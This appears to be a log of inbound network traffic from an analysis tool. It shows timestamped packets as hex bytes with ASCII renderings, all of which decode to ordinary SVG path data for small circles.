2023-03-22 04:45:56 UTC	2590	IN	Data Raw: 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 35 2e 38 32 2c 31 34 39 2e 33 36 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 36 Data Ascii: .36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M845.82,149.36a1.68,1.68,0,0,1,.76-2.2,2.47,2.47,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"/><path class="cls-4" d="M846
2023-03-22 04:45:56 UTC	2606	IN	Data Raw: 32 37 39 2e 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 32 39 2e 36 33 2c 32 38 36 2e 36 33 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 Data Ascii: 279.8a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M829.63,286.63a1.68,1.68,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.92,2.37,2.37,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.8
2023-03-22 04:45:56 UTC	2622	IN	Data Raw: 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 39 39 2e 38 2c 32 32 36 2e 31 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 30 2c 32 33 32 2e 39 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c Data Ascii: 0,0,1-.16-2.81"/><path class="cls-4" d="M799.8,226.11a1.7,1.7,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"/><path class="cls-4" d="M800,232.94a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,
2023-03-22 04:45:56 UTC	2638	IN	Data Raw: 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 35 2e 32 35 2c 32 33 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 35 2c 32 32 39 2e 32 35 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c Data Ascii: ,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M505.25,237a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M505,229.25a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,
2023-03-22 04:45:56 UTC	2654	IN	Data Raw: 30 37 2c 39 37 2e 32 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 33 2e 38 31 2c 38 39 2e 35 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c Data Ascii: 07,97.27a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M523.81,89.56a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,
2023-03-22 04:45:56 UTC	2670	IN	Data Raw: 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 35 37 2e 37 38 2c 31 36 35 2e 36 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c Data Ascii: ,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1.05,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M557.78,165.66a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,
2023-03-22 04:45:56 UTC	2686	IN	Data Raw: 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 31 2e 37 35 2c 32 34 31 2e 37 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 2f 3e 3c 70 61 74 68 20 63 6c Data Ascii: ,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M591.75,241.76a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17"/><path cl
2023-03-22 04:45:56 UTC	2703	IN	Data Raw: 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 35 37 2c 31 30 32 2e 30 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 33 31 2c 39 34 2e 33 36 61 31 2e 39 Data Ascii: -3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M610.57,102.07a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M610.31,94.36a1.9
2023-03-22 04:45:56 UTC	2719	IN	Data Raw: 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2e 35 34 2c 31 37 38 2e 31 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2e 32 38 2c 31 37 30 2e 34 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c Data Ascii: 7,0,0,1,.18,3.18"/><path class="cls-7" d="M644.54,178.17a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M644.28,170.46a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,
2023-03-22 04:45:57 UTC	2787	IN	Data Raw: 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2e 35 31 2c 32 35 34 2e 32 38 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2e 32 35 2c 32 34 36 2e 35 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 Data Ascii: ath class="cls-7" d="M678.51,254.28a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M678.25,246.56a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66
2023-03-22 04:45:57 UTC	2803	IN	Data Raw: 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 39 37 2e 30 37 2c 31 30 36 2e 38 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 Data Ascii: ,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M697.07,106.87a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2
2023-03-22 04:45:57 UTC	2819	IN	Data Raw: 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 33 31 2c 31 38 33 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 Data Ascii: -1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M731,183a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d
2023-03-22 04:45:57 UTC	2835	IN	Data Raw: 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 35 2c 32 35 39 2e 30 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 34 2e 37 35 2c 32 35 31 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 Data Ascii: 2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M765,259.07a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M764.75,251.36a1.91,1.91,0,0,1-.87,2.48,2.79
2023-03-22 04:45:57 UTC	2851	IN	Data Raw: 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 35 33 2e 33 34 2c 32 36 38 2e 32 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d Data Ascii: 12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M653.34,268.22a2.16,2.16,0,0,1-1.09,2.75,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M
2023-03-22 04:45:57 UTC	2867	IN	Data Raw: 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 38 2e 30 38 2c 33 32 39 2e 32 39 41 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2c 36 38 37 2c 33 33 32 61 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 Data Ascii: 1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M688.08,329.29A2.16,2.16,0,0,1,687,332a3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d
2023-03-22 04:45:57 UTC	2883	IN	Data Raw: 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 32 2e 38 31 2c 33 39 30 2e 33 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 32 2e 38 39 2c 33 38 31 2e 36 Data Ascii: 0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M722.81,390.36a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M722.89,381.6
2023-03-22 04:45:57 UTC	2899	IN	Data Raw: 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 35 35 2c 34 35 31 2e 34 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 36 32 2c 34 34 32 2e 37 36 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c Data Ascii: ,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M757.55,451.44a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M757.62,442.76a2.14,2.14,0,0,1-1.09,2.75,
2023-03-22 04:45:57 UTC	2915	IN	Data Raw: 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 36 32 2c 32 36 39 2e 33 39 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 2c 32 36 30 2e 37 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 